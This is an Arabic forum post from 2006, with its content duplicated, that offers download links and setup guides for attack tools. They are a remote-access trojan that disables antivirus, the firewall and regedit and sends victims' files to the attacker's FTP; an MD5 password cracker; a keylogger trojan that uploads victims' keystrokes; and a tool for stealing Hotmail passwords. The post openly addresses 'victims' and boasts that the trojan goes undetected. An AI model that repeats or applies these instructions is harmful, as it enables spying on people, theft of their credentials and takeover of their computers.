مؤمن
01-18-2006, 01:55 AM
ملحوظة : لو عاوز تتعلم هاك صح عليك بالمواقع الاجنبي هتلاقي دايما فيها قسم للمبتدئين فيه مقالات كتيرعن الهاكينج و الكراكينج و التشفير و البرمجة حاول تقراها على قد ما تقدر و خليك فاكر the more you read the more you learn
بس احنا هنبتدي النهارده بالبرامج العربي كبداية بس للي ميعرفوش اي حاجة عن الموضوع
البرنامج الاول
المقرصن
http://www.up.mixq8.com/uploads5/almq22.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/almq2.zip)
الشرح
وظيفة البرنامج: ارسال الملفات من والى جهاز الضحية مع تصفح كامل لملفاته .
حجم التروجان: 44 كيلو بايت تقريبا وبعد الضغط بالـ UPX يصبح 20 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و المميزات والتحسينات:ا
1- استخدام تقنية تخطي الشبكات وهذا اول برنامج عربي باعتقادي يستخدم لهذه التقنية
وهي تساعدك في اختراق اجهزة مقاهي الانترنت والجامعات او الشركات...الخ وانت خارج الشبكة.
2- عدم استخدام طريقة الـ S.I.N باعتماد على موقع no-ip.com في عملية تخطي الشبكات بل طريقة جديدة تسهل على المسخدم تخطي الشبكات وهذا اول برنامج عربي يستخدمها وايضا اول برنامج على مستوى البرامج الأجنبية باعتقادي تستخدم هذه الطريقة اذ ان جميع البرامج الأجنبية تعتمد على الـ S.I.N عن طريق موقع no-ip.com.
3- استخدام تقنية الملفات المساعدة بحيث تستطيع برمجة ملف مساعد بنفسك وارساله للضحية
وتشغيل الامر الذي به.
4- عمل الكثير من التعديلات البرمجية وحل بعض المشاكل البرمجية التي كانت في الاصدار الأول من البرنامج.
5- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
6- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
7- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
8- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
9- غير مكتشف من قبل برامج الحماية حتى الآن.
شرح فكرة البرنامج:
فكرة البرنامج هي نقل الملفات من والى جهاز الضحية عن طريق موقع تضع فيه الملف الذي تريد ان تحمله الى جهاز الضحية ومن ثم تصدر امر التحميل اما بالنسبة لرفع ملف من جهاز الضحية الى جهازك فيتم ارسال الملف الى موقعك (حساب الـ FTP) عن طريق البيانات التي وضعتها في السيرفر بمعنى اخر لا يوجد اتصال مباشر بينك وبين الضحية اثناء نقل الملفات.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المقرصن2: وهو البرنامج الرئيسي.
file.php : وهو الملف الخاص بالتبليغ عن طريق ال PHP.
upx.exe : وهو برنامج لضغط الملفات.
اولا قم بفتح برنامج المقرصن2 ثم اضغط على اعدادات الخادم ثم اختر نوع الخادم الذي تريده وغير البيانات كما يلي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
المنفذ: اكتب اي منفذ يعجبك وينصح ان يكون المنفذ غير معروف (مشهور) غير معروف لكي لا يتعارض مع نفس المنفذ اذا كانت هناك برامج اخرى تستخدم نفس المنفذ.
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
قتل جدا النار الخاص لـ xp : هذا الخيار سوف يقوم بايقاف جدار النار الخاص بويندوز اكس بي.
حذف برنامج الـ Regedit.exe : هذا الخيار يقوم بحذف برنامج ال Regedit الذي يقوم بتصفح الرجستري.
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
الايقونة: اضغط على الزر ومن ثم اختر ايقونة السيرفر.
سيرفر الـ FTP : اكتب هنا سيرفر الـFTP الخاص لموقعك مثال لسيرفر الـ lycos:
ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للـ FTP لموقعك.
كلمة المرور: اكتب نا كلمة المرور الخاص للـ FTP لموقعك.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجلد البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظات:
- عند الاتصال بالضحية تستطيع رؤية ملفاته عن طريق اختيار السواقة وتستطيع فتح المجلدات عن طريق الضغط مرتين على المجلد.
لرفع الملفات من والى جهاز الضحية اضغط على الملف او قائمة الملفات بالزر الايمن وسوف تظهر لك قائمة اختر منها الامر الذي تريد تنفيذه.
- عند الاتصال بالضحية لا تقم باصدار عدة اوامر في وقت واحد قم باصدار امر واحد ثم انتظر حتى ينتهي ومن ثم اصدر الامرالذي بعده.
-اثناء نقل الملفات لا تقم باصدار اي امر اخر حتى تظهر لك رسالة انهاء نقل الملف ومن بعدها اصدر الاوامر الاخرى.
- بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
www.yoursite.com/file.php
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.html ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.html
www.yoursite.com/log.html
- اما بالنسبة للابلاغ عن طريق البريد لا انصح المستخدمين الاعتماد الكلي عليها.
- عند اعداد خادم للشبكات يجب ان يكون رابط الملف الذي يأخذ منه الخادم الايبي بهذا الشكل او
ما شابهه:
www.yoursite.com/ip.txt
بحيث تكتب في ملف ال Ip.txt ايبي جهازك فقط ولا تزيد عليه اي شئ وكل ما تدخل الانترنت غير الايبي الموجود في الملف لأن ايبيك سوف يتغير اذا كنت من مستخدمي الاتصال العادي.
- بالنسبة لخيار الانصات اختر رقم المنفذ الذي حددته في الخادم ثم اضغط على زر بدء الانصات
وتستطيع ان تتحكم باكثر من خادم يتصل بك في نفس الوقت كل ما عليك هو اختيار الايبي الموجود
في قائمة الايبيات المتصلة حتى تتحكم بالايبي المطلوب واكرر ذلك يجب عليك ان تختار الايبي الذي تريد ان تتحكم عليه لأنك لو لم تختر اي ايبي فلن ترسل الاوامر للخادم.
- بالنسبة لمن يريد عمل ملف مساعد خاص به يستخدمه مع الخادم فهذا مثال على الدلفي
سوف يفيد المبرمجين في ذلك:
library Project1;
uses
windows;
procedure test; stdcall;
begin
messagebox(0,'anytext','your title',mb_ok);
end;
exports
test;
begin
end.
حيث يجب ان تكون اسم الاجرائية test لأن البرنامج مبرمج بهذا الاسم.
البرنامج الثاني
الكاسر
http://www.up.mixq8.com/uploads5/121.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/cracker.zip)
الشرح
وظيفة البرنامج: كسر كلمات سر الـ (md5) المشفرة .
مواصفات البرنامج :ا
1- تجربة الف كلمة في الدقيقة تقريبا وهذا يعني عشرة الاف كلمة في عشر دقائق
وهذا يعني مائة الف كلمة في الساعة يعني مليون كلمة في اليوم.
2- عند البد بعملية الكسر ليس هناك تأثير كبير على الجهاز بهذا تستطيع استخدامه
وانت تعمل على اشياء اخرى (التجربة خير برهان).
3- كشف اي كلمة سر مهما كانت صعوبتها مادام كان موجودا في قائمة الكلمات التي يجربها.
4- اقصى حد لقائمة الكلمات هي 32000 كلمة .
5- يوجد عداد يخبرك بالكلمات المتبقية التي لم يتم تجربتها.
6- تيستطيع وقف عملية الكسر في اي وقت شئت.
شرح فكرة البرنامج:
فكرة البرنامج هي تخمين كلمات السر حتى تطابق كلمة السر المشفرة وهذا يعتمد على الكلمات
التي وضعتها في القائمة.
شرح البرنامج:
اولا عند فك ضغط البرنامج :
افتح البرنامج وضع في خانة كلمة السر المشفرة الباسوورد المشفر
وبعد ذلك اضغط على تحميل الكلمات واختر الملف الذي به الكلمات ثم
اضغط على زر بدء عملية كسر كلمة السر وانتظر حتى يكسر كلمة السر واذا كسر سوف تظهر
لك رسالة تخبرك بذلك وتظهر كلمة السر في خانة كلمة السر.
ملاحظات:
- عند تحميل الكلمات ضعها في ملف من نوع txt ثم حملها.
- للحصول على قائمة للكلمات يوجد الكثير من البرامج التي تقوم بذلك حيث تجهز لك
كلمات كثيرة اما اذا احببت ان تجهز قائمتك فلك ذلك او انك تبحث عن قائمة الكلمات في الانترنت .
مثال تجريبي:
افتح البرنامج وضع هذا الباسوورد المشفر:
e10adc3949ba59abbe56e057f20f883e
افتح وحمل قائمة الكلمات وضع من ضمنها الرقم 123456
لأنها هي كلمة السر قبل التشفيير وابدأ عملية الكسر وانظر للنتيجة.
البرنامج الثالث
قناص الكيبورد
http://www.up.mixq8.com/uploads5/ksniper2.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/ksniper2.zip)
الشرح
وظيفة البرنامج: التجسس على لوحة المفاتيح وتسجيل كل ما تكتبه الضحية ثم ارسالها لك.
حجم التروجان: 37 كيلو بايت وبعد الضغط بال UPX يصبح 18 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و السيرفر:ا
1- ارسال الكتابات المسجلة عن طريق الـ FTP ويعني ذلك انه لا داعي من القلق من مساحة الكتابات.
2- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات حتى باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كاسم مستخدم موقعك وكلمة سره المخزن او رابط سيرفر الـ FTP.
3- التروجان لا يتوقف عن التسجيل عند وصول حجم الكتابات الى حجم معين وهذا يعني انه يسجل كل شئ تكتبه الضحية.
4- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
قناص الكيبورد2: وهو البرنامج الرئيسي.
server.svr : وهو الملف المساعد لتكوين السيرفر.
upx.exe : وهو برنامج لضغط الملفات.
اول شئ تقوم بالضغط على زر قراءة الملف ثم اختر الملف server.svr وبعد ذلك غير البيانات كما يأتي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
الضغط بواسطة ال UPX : هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
سيرفر الـ FTP : اكتب هنا سيرفر الـ FTP الخاص لحسابك مثال لسيرفر موقع Lycos
المجاني : ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للدخول على حسابك على سيرفر الـ FTP .
كلمة السر: اكتب هنا كلمة السر الخاص للدخول على حسابك على سيرفر الـ FTP .
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجل البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظة:
- عندما يرسال السيرفر للكتابات على موقعكفانه يصل لك بهذا الشكل:
victim1.txt
victim2.txt
victim3.txt
victim*.txt
وهكذا....... اي ان ملف الكتابات تكون على اسم الضحية التي اخترتها باضافة رقم حتى لا يضيف السيرفر ملف الكتابات الجديدة على القديمة .
- يفضل قبل ارسال السيرفر الى الضحية القيام بتجربة سيرفر الـ FTP الخاص لموقعك وسوف يرسل
البرنامج الى موعك ملف باسم الضحية التي اخترتها على موقعك وتكون فارغة بهذا تستدل على ان
سيرفر الـ FTP يعمل جيدا والعكس صحيح.
قاتل الهوتميل
http://www.up.mixq8.com/uploads5/hkill2.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/hkill2.zip)
الشرح
وظيفة البرنامج: سرقة كلمة سر البريد
أرجو عدم استخدامه ضد المسلمين مع أني متأكد ان أغلبكم سوف يقوم بذلك (كل واحد وضميره)
الشرح:
اولا: قم بكتابة بريد الضحية من غير @hotmail.com .
ثانيا: اكتب بريدك كاملا.
ثالثا: املأ بيانات الارسال.
رابعا: اضغط على ارسال البريد.
ملاحظات:
1- جرب استخدام البرنامج عى نفسك لكي تتعلم كيف تتعامل معه.
2- لا يشترط ان يكون بريدك على الهوتميل تستطيع كتابة اي بريد لك عل اي سيرفر.
3- الرسالة التي تأتيك تكون من Nobody وفي موضوع الرسالة بريد الضحية
وداخل الرسالة كلمة سر الضحية.
4- عند كتابة بريد المرسل يفضل كتابة اي بريد ولكن لا ينتهي ب @hotmail.com
لأنه لو انتهى به فلن تصل الراسلة في اغلب الاحيان لذا دع نهاية البريد اي سيرفر غير الهوتميل مثال
victim@yahoo.com
5- ارسل الراسلة اكثر من مرة على الاقل مرتين لكي تتأكد من انها رسلت.
6- انتظر بعض الوقت لكي يتم ارسا الرسالة بشكل ناجح.
مشكووووورين
برنامج
بس احنا هنبتدي النهارده بالبرامج العربي كبداية بس للي ميعرفوش اي حاجة عن الموضوع
البرنامج الاول
المقرصن
http://www.up.mixq8.com/uploads5/almq22.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/almq2.zip)
الشرح
وظيفة البرنامج: ارسال الملفات من والى جهاز الضحية مع تصفح كامل لملفاته .
حجم التروجان: 44 كيلو بايت تقريبا وبعد الضغط بالـ UPX يصبح 20 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و المميزات والتحسينات:ا
1- استخدام تقنية تخطي الشبكات وهذا اول برنامج عربي باعتقادي يستخدم لهذه التقنية
وهي تساعدك في اختراق اجهزة مقاهي الانترنت والجامعات او الشركات...الخ وانت خارج الشبكة.
2- عدم استخدام طريقة الـ S.I.N باعتماد على موقع no-ip.com في عملية تخطي الشبكات بل طريقة جديدة تسهل على المسخدم تخطي الشبكات وهذا اول برنامج عربي يستخدمها وايضا اول برنامج على مستوى البرامج الأجنبية باعتقادي تستخدم هذه الطريقة اذ ان جميع البرامج الأجنبية تعتمد على الـ S.I.N عن طريق موقع no-ip.com.
3- استخدام تقنية الملفات المساعدة بحيث تستطيع برمجة ملف مساعد بنفسك وارساله للضحية
وتشغيل الامر الذي به.
4- عمل الكثير من التعديلات البرمجية وحل بعض المشاكل البرمجية التي كانت في الاصدار الأول من البرنامج.
5- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
6- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
7- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
8- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
9- غير مكتشف من قبل برامج الحماية حتى الآن.
شرح فكرة البرنامج:
فكرة البرنامج هي نقل الملفات من والى جهاز الضحية عن طريق موقع تضع فيه الملف الذي تريد ان تحمله الى جهاز الضحية ومن ثم تصدر امر التحميل اما بالنسبة لرفع ملف من جهاز الضحية الى جهازك فيتم ارسال الملف الى موقعك (حساب الـ FTP) عن طريق البيانات التي وضعتها في السيرفر بمعنى اخر لا يوجد اتصال مباشر بينك وبين الضحية اثناء نقل الملفات.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المقرصن2: وهو البرنامج الرئيسي.
file.php : وهو الملف الخاص بالتبليغ عن طريق ال PHP.
upx.exe : وهو برنامج لضغط الملفات.
اولا قم بفتح برنامج المقرصن2 ثم اضغط على اعدادات الخادم ثم اختر نوع الخادم الذي تريده وغير البيانات كما يلي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
المنفذ: اكتب اي منفذ يعجبك وينصح ان يكون المنفذ غير معروف (مشهور) غير معروف لكي لا يتعارض مع نفس المنفذ اذا كانت هناك برامج اخرى تستخدم نفس المنفذ.
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
قتل جدا النار الخاص لـ xp : هذا الخيار سوف يقوم بايقاف جدار النار الخاص بويندوز اكس بي.
حذف برنامج الـ Regedit.exe : هذا الخيار يقوم بحذف برنامج ال Regedit الذي يقوم بتصفح الرجستري.
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
الايقونة: اضغط على الزر ومن ثم اختر ايقونة السيرفر.
سيرفر الـ FTP : اكتب هنا سيرفر الـFTP الخاص لموقعك مثال لسيرفر الـ lycos:
ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للـ FTP لموقعك.
كلمة المرور: اكتب نا كلمة المرور الخاص للـ FTP لموقعك.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجلد البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظات:
- عند الاتصال بالضحية تستطيع رؤية ملفاته عن طريق اختيار السواقة وتستطيع فتح المجلدات عن طريق الضغط مرتين على المجلد.
لرفع الملفات من والى جهاز الضحية اضغط على الملف او قائمة الملفات بالزر الايمن وسوف تظهر لك قائمة اختر منها الامر الذي تريد تنفيذه.
- عند الاتصال بالضحية لا تقم باصدار عدة اوامر في وقت واحد قم باصدار امر واحد ثم انتظر حتى ينتهي ومن ثم اصدر الامرالذي بعده.
-اثناء نقل الملفات لا تقم باصدار اي امر اخر حتى تظهر لك رسالة انهاء نقل الملف ومن بعدها اصدر الاوامر الاخرى.
- بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
www.yoursite.com/file.php
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.html ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.html
www.yoursite.com/log.html
- اما بالنسبة للابلاغ عن طريق البريد لا انصح المستخدمين الاعتماد الكلي عليها.
- عند اعداد خادم للشبكات يجب ان يكون رابط الملف الذي يأخذ منه الخادم الايبي بهذا الشكل او
ما شابهه:
www.yoursite.com/ip.txt
بحيث تكتب في ملف ال Ip.txt ايبي جهازك فقط ولا تزيد عليه اي شئ وكل ما تدخل الانترنت غير الايبي الموجود في الملف لأن ايبيك سوف يتغير اذا كنت من مستخدمي الاتصال العادي.
- بالنسبة لخيار الانصات اختر رقم المنفذ الذي حددته في الخادم ثم اضغط على زر بدء الانصات
وتستطيع ان تتحكم باكثر من خادم يتصل بك في نفس الوقت كل ما عليك هو اختيار الايبي الموجود
في قائمة الايبيات المتصلة حتى تتحكم بالايبي المطلوب واكرر ذلك يجب عليك ان تختار الايبي الذي تريد ان تتحكم عليه لأنك لو لم تختر اي ايبي فلن ترسل الاوامر للخادم.
- بالنسبة لمن يريد عمل ملف مساعد خاص به يستخدمه مع الخادم فهذا مثال على الدلفي
سوف يفيد المبرمجين في ذلك:
library Project1;
uses
windows;
procedure test; stdcall;
begin
messagebox(0,'anytext','your title',mb_ok);
end;
exports
test;
begin
end.
حيث يجب ان تكون اسم الاجرائية test لأن البرنامج مبرمج بهذا الاسم.
البرنامج الثاني
الكاسر
http://www.up.mixq8.com/uploads5/121.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/cracker.zip)
الشرح
وظيفة البرنامج: كسر كلمات سر الـ (md5) المشفرة .
مواصفات البرنامج :ا
1- تجربة الف كلمة في الدقيقة تقريبا وهذا يعني عشرة الاف كلمة في عشر دقائق
وهذا يعني مائة الف كلمة في الساعة يعني مليون كلمة في اليوم.
2- عند البد بعملية الكسر ليس هناك تأثير كبير على الجهاز بهذا تستطيع استخدامه
وانت تعمل على اشياء اخرى (التجربة خير برهان).
3- كشف اي كلمة سر مهما كانت صعوبتها مادام كان موجودا في قائمة الكلمات التي يجربها.
4- اقصى حد لقائمة الكلمات هي 32000 كلمة .
5- يوجد عداد يخبرك بالكلمات المتبقية التي لم يتم تجربتها.
6- تيستطيع وقف عملية الكسر في اي وقت شئت.
شرح فكرة البرنامج:
فكرة البرنامج هي تخمين كلمات السر حتى تطابق كلمة السر المشفرة وهذا يعتمد على الكلمات
التي وضعتها في القائمة.
شرح البرنامج:
اولا عند فك ضغط البرنامج :
افتح البرنامج وضع في خانة كلمة السر المشفرة الباسوورد المشفر
وبعد ذلك اضغط على تحميل الكلمات واختر الملف الذي به الكلمات ثم
اضغط على زر بدء عملية كسر كلمة السر وانتظر حتى يكسر كلمة السر واذا كسر سوف تظهر
لك رسالة تخبرك بذلك وتظهر كلمة السر في خانة كلمة السر.
ملاحظات:
- عند تحميل الكلمات ضعها في ملف من نوع txt ثم حملها.
- للحصول على قائمة للكلمات يوجد الكثير من البرامج التي تقوم بذلك حيث تجهز لك
كلمات كثيرة اما اذا احببت ان تجهز قائمتك فلك ذلك او انك تبحث عن قائمة الكلمات في الانترنت .
مثال تجريبي:
افتح البرنامج وضع هذا الباسوورد المشفر:
e10adc3949ba59abbe56e057f20f883e
افتح وحمل قائمة الكلمات وضع من ضمنها الرقم 123456
لأنها هي كلمة السر قبل التشفيير وابدأ عملية الكسر وانظر للنتيجة.
البرنامج الثالث
قناص الكيبورد
http://www.up.mixq8.com/uploads5/ksniper2.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/ksniper2.zip)
الشرح
وظيفة البرنامج: التجسس على لوحة المفاتيح وتسجيل كل ما تكتبه الضحية ثم ارسالها لك.
حجم التروجان: 37 كيلو بايت وبعد الضغط بال UPX يصبح 18 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و السيرفر:ا
1- ارسال الكتابات المسجلة عن طريق الـ FTP ويعني ذلك انه لا داعي من القلق من مساحة الكتابات.
2- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات حتى باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كاسم مستخدم موقعك وكلمة سره المخزن او رابط سيرفر الـ FTP.
3- التروجان لا يتوقف عن التسجيل عند وصول حجم الكتابات الى حجم معين وهذا يعني انه يسجل كل شئ تكتبه الضحية.
4- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
قناص الكيبورد2: وهو البرنامج الرئيسي.
server.svr : وهو الملف المساعد لتكوين السيرفر.
upx.exe : وهو برنامج لضغط الملفات.
اول شئ تقوم بالضغط على زر قراءة الملف ثم اختر الملف server.svr وبعد ذلك غير البيانات كما يأتي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
الضغط بواسطة ال UPX : هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
سيرفر الـ FTP : اكتب هنا سيرفر الـ FTP الخاص لحسابك مثال لسيرفر موقع Lycos
المجاني : ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للدخول على حسابك على سيرفر الـ FTP .
كلمة السر: اكتب هنا كلمة السر الخاص للدخول على حسابك على سيرفر الـ FTP .
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجل البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظة:
- عندما يرسال السيرفر للكتابات على موقعكفانه يصل لك بهذا الشكل:
victim1.txt
victim2.txt
victim3.txt
victim*.txt
وهكذا....... اي ان ملف الكتابات تكون على اسم الضحية التي اخترتها باضافة رقم حتى لا يضيف السيرفر ملف الكتابات الجديدة على القديمة .
- يفضل قبل ارسال السيرفر الى الضحية القيام بتجربة سيرفر الـ FTP الخاص لموقعك وسوف يرسل
البرنامج الى موعك ملف باسم الضحية التي اخترتها على موقعك وتكون فارغة بهذا تستدل على ان
سيرفر الـ FTP يعمل جيدا والعكس صحيح.
قاتل الهوتميل
http://www.up.mixq8.com/uploads5/hkill2.jpg
للتحميل اضغط هنا (http://www.geocities.com/dr_ahmedhamdy/hkill2.zip)
الشرح
وظيفة البرنامج: سرقة كلمة سر البريد
أرجو عدم استخدامه ضد المسلمين مع أني متأكد ان أغلبكم سوف يقوم بذلك (كل واحد وضميره)
الشرح:
اولا: قم بكتابة بريد الضحية من غير @hotmail.com .
ثانيا: اكتب بريدك كاملا.
ثالثا: املأ بيانات الارسال.
رابعا: اضغط على ارسال البريد.
ملاحظات:
1- جرب استخدام البرنامج عى نفسك لكي تتعلم كيف تتعامل معه.
2- لا يشترط ان يكون بريدك على الهوتميل تستطيع كتابة اي بريد لك عل اي سيرفر.
3- الرسالة التي تأتيك تكون من Nobody وفي موضوع الرسالة بريد الضحية
وداخل الرسالة كلمة سر الضحية.
4- عند كتابة بريد المرسل يفضل كتابة اي بريد ولكن لا ينتهي ب @hotmail.com
لأنه لو انتهى به فلن تصل الراسلة في اغلب الاحيان لذا دع نهاية البريد اي سيرفر غير الهوتميل مثال
victim@yahoo.com
5- ارسل الراسلة اكثر من مرة على الاقل مرتين لكي تتأكد من انها رسلت.
6- انتظر بعض الوقت لكي يتم ارسا الرسالة بشكل ناجح.
مشكووووورين
برنامج